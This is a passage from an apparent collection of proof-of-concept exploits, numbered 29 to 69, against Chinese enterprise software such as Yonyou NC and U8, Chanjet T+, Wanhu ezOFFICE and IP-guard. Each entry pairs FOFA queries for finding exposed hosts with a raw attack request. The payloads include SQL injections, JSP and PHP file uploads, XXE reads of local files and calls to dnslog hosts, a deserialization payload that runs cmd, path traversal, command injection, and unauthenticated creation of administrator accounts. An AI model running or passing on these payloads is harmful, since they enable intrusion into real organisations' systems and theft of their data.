User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. 用友NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. 用友NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. 用友NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. 用友NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. 用友NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. 用友NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. 用友NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. 用友NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. 用友NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. 用友U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. 用友U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. 用友U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. 用友U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. 用友GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. 用友GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
<soapenv:Header/>
<soapenv:Body>
 <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
 </ser:getUserNameById>
</soapenv:Body>
</soapenv:Envelope>

44. 用友GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. 用友GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. 用友GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. 用友GRP A++Cloud 政府财务云 arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. 用友U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. 用友U8 CRM system uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空社会化商业ERP系统 validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. 泛微E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. 迪普 DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. 畅捷通T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the given string into the given file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
"storeID":{
 "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
 "MethodName":"Start",
 "ObjectInstance":{
 "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
 "StartInfo":{
 "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
 "FileName":"cmd",
 "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
 }
 }
}
}

Step 2: visit the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. 畅捷通T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the following interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
"storeID":{
 "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
 "MethodName":"Start",
 "ObjectInstance":{
 "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
 "StartInfo": {
 "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
 "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
 }
 }
}
}

57. 畅捷通T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. 畅捷通T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓Smart管理平台 importexport.php SQL injection
FOFA: title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The sql parameter is base64: c2VsZWN0IDEsdXNlcigpLDM= decodes to select 1,user(),3, which the endpoint executes and exports.

61. 浙大恩特客户资源管理系统 fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request the file the injected echo wrote:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
Affected: IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚管理信息系统 CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

The check is time-based: a vulnerable target answers roughly 5 seconds late.

65. 优卡特脸爱云一脸通智慧管理平台 1.0.55.0.0.1 authorization bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created without authentication.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户ezOFFICE协同管理平台 SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9 when the target is vulnerable; that is the MD5 of 102103122, computed on the database side by the injected HashBytes call.

67. 万户ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, dir gives the directory it is written to, and fileType gives its extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is then reachable at /defaultroot/platform/portal/layout/apoxkq.jsp.

68. 万户ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The ;.js suffix is a Tomcat path-parameter trick: the container strips everything after ; in the segment and still serves wf_printnum.jsp, while a suffix-based access filter sees a .js request. The same trick appears in the next entry.

69. 万户ezOFFICE contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
